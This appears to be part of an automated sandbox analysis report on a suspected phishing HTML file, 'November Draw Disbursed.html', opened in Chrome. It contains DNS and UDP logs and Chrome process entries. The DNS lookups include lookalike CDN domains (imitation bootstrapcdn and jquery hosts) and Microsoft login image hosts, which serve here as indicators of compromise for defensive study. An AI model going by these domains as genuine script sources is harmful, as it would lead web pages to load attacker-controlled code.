Nov 29, 2022 19:59:11.132739067 CET | 56042 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 19:59:11.150424957 CET | 53 | 56042 | 8.8.8.8 | 192.168.2.3
Nov 29, 2022 19:59:11.320646048 CET | 53 | 60582 | 8.8.8.8 | 192.168.2.3
Nov 29, 2022 19:59:11.330082893 CET | 53 | 62050 | 8.8.8.8 | 192.168.2.3
Nov 29, 2022 19:59:13.326191902 CET | 55638 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 19:59:13.357458115 CET | 53 | 55638 | 8.8.8.8 | 192.168.2.3
Nov 29, 2022 19:59:15.999356031 CET | 53848 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 19:59:16.032098055 CET | 53 | 53848 | 8.8.8.8 | 192.168.2.3
Nov 29, 2022 19:59:17.737325907 CET | 58691 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 19:59:17.738293886 CET | 53305 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 19:59:17.759807110 CET | 53 | 58691 | 8.8.8.8 | 192.168.2.3
Nov 29, 2022 19:59:27.923060894 CET | 65017 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 19:59:27.943217039 CET | 53 | 65017 | 8.8.8.8 | 192.168.2.3
Nov 29, 2022 20:00:11.191204071 CET | 64967 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 20:00:11.205492973 CET | 60825 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 20:00:11.208045006 CET | 53 | 64967 | 8.8.8.8 | 192.168.2.3
Nov 29, 2022 20:00:11.226298094 CET | 53 | 60825 | 8.8.8.8 | 192.168.2.3
Nov 29, 2022 20:01:11.264585972 CET | 59374 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 20:01:11.283909082 CET | 53 | 59374 | 8.8.8.8 | 192.168.2.3
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Nov 29, 2022 19:59:07.068732023 CET192.168.2.38.8.8.80xbc6cStandard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:07.472232103 CET192.168.2.38.8.8.80x6bdcStandard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:09.219088078 CET192.168.2.38.8.8.80xeaStandard query (0)descansonline.comA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:11.034914970 CET192.168.2.38.8.8.80xffa0Standard query (0)maxcdn.bootstrapcdn.cloudA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:11.042839050 CET192.168.2.38.8.8.80x2e03Standard query (0)code.jquery.com.deA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:11.043695927 CET192.168.2.38.8.8.80xbb67Standard query (0)maxcdn.bootstrapcdn.restA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:11.044045925 CET192.168.2.38.8.8.80x773fStandard query (0)code.jquery.questA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:11.132739067 CET192.168.2.38.8.8.80xc87eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:13.326191902 CET192.168.2.38.8.8.80x5c60Standard query (0)i.postimg.ccA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:15.999356031 CET192.168.2.38.8.8.80xf708Standard query (0)i.postimg.ccA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:17.737325907 CET192.168.2.38.8.8.80x63d9Standard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:17.738293886 CET192.168.2.38.8.8.80x7d23Standard query (0)aadcdn.msauthimages.netA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:27.923060894 CET192.168.2.38.8.8.80xe01aStandard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                Nov 29, 2022 20:00:11.191204071 CET192.168.2.38.8.8.80x9160Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                Nov 29, 2022 20:00:11.205492973 CET192.168.2.38.8.8.80x6e69Standard query (0)maxcdn.bootstrapcdn.cloudA (IP address)IN (0x0001)false
                                Nov 29, 2022 20:01:11.264585972 CET192.168.2.38.8.8.80x628bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                Nov 29, 2022 19:59:07.086155891 CET | 8.8.8.8 | 192.168.2.3 | 0xbc6c | No error (0) | clients2.google.com | clients.l.google.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                Nov 29, 2022 19:59:07.086155891 CET | 8.8.8.8 | 192.168.2.3 | 0xbc6c | No error (0) | clients.l.google.com |  | 142.250.203.110 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:07.510745049 CET | 8.8.8.8 | 192.168.2.3 | 0x6bdc | No error (0) | accounts.google.com |  | 172.217.168.45 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:09.243546963 CET | 8.8.8.8 | 192.168.2.3 | 0xea | No error (0) | descansonline.com |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:09.243546963 CET | 8.8.8.8 | 192.168.2.3 | 0xea | No error (0) | descansonline.com |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:11.055634022 CET | 8.8.8.8 | 192.168.2.3 | 0xffa0 | No error (0) | maxcdn.bootstrapcdn.cloud |  | 68.65.123.205 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:11.066426992 CET | 8.8.8.8 | 192.168.2.3 | 0xbb67 | No error (0) | maxcdn.bootstrapcdn.rest |  | 172.67.188.128 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:11.066426992 CET | 8.8.8.8 | 192.168.2.3 | 0xbb67 | No error (0) | maxcdn.bootstrapcdn.rest |  | 104.21.40.223 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:11.150424957 CET | 8.8.8.8 | 192.168.2.3 | 0xc87e | No error (0) | www.google.com |  | 172.217.168.68 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:11.320646048 CET | 8.8.8.8 | 192.168.2.3 | 0x2e03 | No error (0) | code.jquery.com.de |  | 38.34.185.163 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:11.330082893 CET | 8.8.8.8 | 192.168.2.3 | 0x773f | No error (0) | code.jquery.quest |  | 38.34.185.163 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:13.357458115 CET | 8.8.8.8 | 192.168.2.3 | 0x5c60 | No error (0) | i.postimg.cc |  | 162.19.88.68 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:13.357458115 CET | 8.8.8.8 | 192.168.2.3 | 0x5c60 | No error (0) | i.postimg.cc |  | 162.19.88.69 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:16.032098055 CET | 8.8.8.8 | 192.168.2.3 | 0xf708 | No error (0) | i.postimg.cc |  | 162.19.88.68 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:16.032098055 CET | 8.8.8.8 | 192.168.2.3 | 0xf708 | No error (0) | i.postimg.cc |  | 162.19.88.69 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:17.759807110 CET | 8.8.8.8 | 192.168.2.3 | 0x63d9 | No error (0) | logo.clearbit.com | d26p066pn2w0s0.cloudfront.net |  | CNAME (Canonical name) | IN (0x0001) | false
                                Nov 29, 2022 19:59:17.759807110 CET | 8.8.8.8 | 192.168.2.3 | 0x63d9 | No error (0) | d26p066pn2w0s0.cloudfront.net |  | 18.172.153.55 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:17.759807110 CET | 8.8.8.8 | 192.168.2.3 | 0x63d9 | No error (0) | d26p066pn2w0s0.cloudfront.net |  | 18.172.153.44 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:17.759807110 CET | 8.8.8.8 | 192.168.2.3 | 0x63d9 | No error (0) | d26p066pn2w0s0.cloudfront.net |  | 18.172.153.108 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:17.759807110 CET | 8.8.8.8 | 192.168.2.3 | 0x63d9 | No error (0) | d26p066pn2w0s0.cloudfront.net |  | 18.172.153.7 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:17.760951042 CET | 8.8.8.8 | 192.168.2.3 | 0x7d23 | No error (0) | aadcdn.msauthimages.net | aadcdn.azureedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
                                Nov 29, 2022 19:59:17.760951042 CET | 8.8.8.8 | 192.168.2.3 | 0x7d23 | No error (0) | cs1025.wpc.upsiloncdn.net |  | 152.199.23.72 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:27.943217039 CET | 8.8.8.8 | 192.168.2.3 | 0xe01a | No error (0) | logo.clearbit.com | d26p066pn2w0s0.cloudfront.net |  | CNAME (Canonical name) | IN (0x0001) | false
                                Nov 29, 2022 19:59:27.943217039 CET | 8.8.8.8 | 192.168.2.3 | 0xe01a | No error (0) | d26p066pn2w0s0.cloudfront.net |  | 18.172.153.55 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:27.943217039 CET | 8.8.8.8 | 192.168.2.3 | 0xe01a | No error (0) | d26p066pn2w0s0.cloudfront.net |  | 18.172.153.44 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:27.943217039 CET | 8.8.8.8 | 192.168.2.3 | 0xe01a | No error (0) | d26p066pn2w0s0.cloudfront.net |  | 18.172.153.108 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 19:59:27.943217039 CET | 8.8.8.8 | 192.168.2.3 | 0xe01a | No error (0) | d26p066pn2w0s0.cloudfront.net |  | 18.172.153.7 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 20:00:11.208045006 CET | 8.8.8.8 | 192.168.2.3 | 0x9160 | No error (0) | www.google.com |  | 172.217.168.68 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 20:00:11.226298094 CET | 8.8.8.8 | 192.168.2.3 | 0x6e69 | No error (0) | maxcdn.bootstrapcdn.cloud |  | 68.65.123.205 | A (IP address) | IN (0x0001) | false
                                Nov 29, 2022 20:01:11.283909082 CET | 8.8.8.8 | 192.168.2.3 | 0x628b | No error (0) | www.google.com |  | 172.217.168.68 | A (IP address) | IN (0x0001) | false


                                Target ID:0
                                Start time:19:59:04
                                Start date:29/11/2022
                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                                Imagebase:0x7ff614650000
                                File size:2851656 bytes
                                MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:1
                                Start time:19:59:05
                                Start date:29/11/2022
                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1856,i,16127261416295333797,16450193774645569565,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                                Imagebase:0x7ff614650000
                                File size:2851656 bytes
                                MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:2
                                Start time:19:59:06
                                Start date:29/11/2022
                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\November Draw Disbursed.html
                                Imagebase:0x7ff614650000
                                File size:2851656 bytes
                                MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                No disassembly